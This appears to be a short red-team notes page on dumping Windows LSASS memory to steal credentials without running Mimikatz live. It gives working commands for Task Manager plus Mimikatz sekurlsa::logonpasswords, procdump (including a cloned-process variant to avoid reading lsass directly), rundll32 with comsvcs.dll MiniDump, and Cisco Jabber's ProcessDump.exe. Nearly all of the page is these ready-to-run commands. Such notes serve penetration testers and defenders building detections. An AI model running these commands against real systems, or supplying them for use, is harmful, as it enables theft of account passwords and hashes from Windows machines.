Dumping Lsass Without Mimikatz

MiniDumpWriteDump API

See my notes about writing a simple custom process dumper using MiniDumpWriteDump API:

Task Manager

Create a minidump of the lsass.exe using task manager (must be running as administrator):
Swtich mimikatz context to the minidump:
1
sekurlsa::minidump C:\Users\ADMINI~1.OFF\AppData\Local\Temp\lsass.DMP
2
sekurlsa::logonpasswords
Copied!

Procdump

Procdump from sysinternal's could also be used to dump the process:
1
procdump.exe -accepteula -ma lsass.exe lsass.dmp
2
3
// or avoid reading lsass by dumping a cloned lsass process
4
procdump.exe -accepteula -r -ma lsass.exe lsass.dmp
Copied!

comsvcs.dll

Executing a native comsvcs.dll DLL found in Windows\system32 with rundll32:
1
.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full
Copied!

ProcessDump.exe from Cisco Jabber

Sometimes Cisco Jabber (always?) comes with a nice utility called ProcessDump.exe that can be found in c:\program files (x86)\cisco systems\cisco jabber\x64\. We can use it to dump lsass process memory in Powershell like so:
1
cd c:\program files (x86)\cisco systems\cisco jabber\x64\
2
processdump.exe (ps lsass).id c:\temp\lsass.dmp
Copied!
screenshot by @em1rerdogan

References

MiniDumpWriteDump via COM+ Services DLL
modexp
Last modified 8mo ago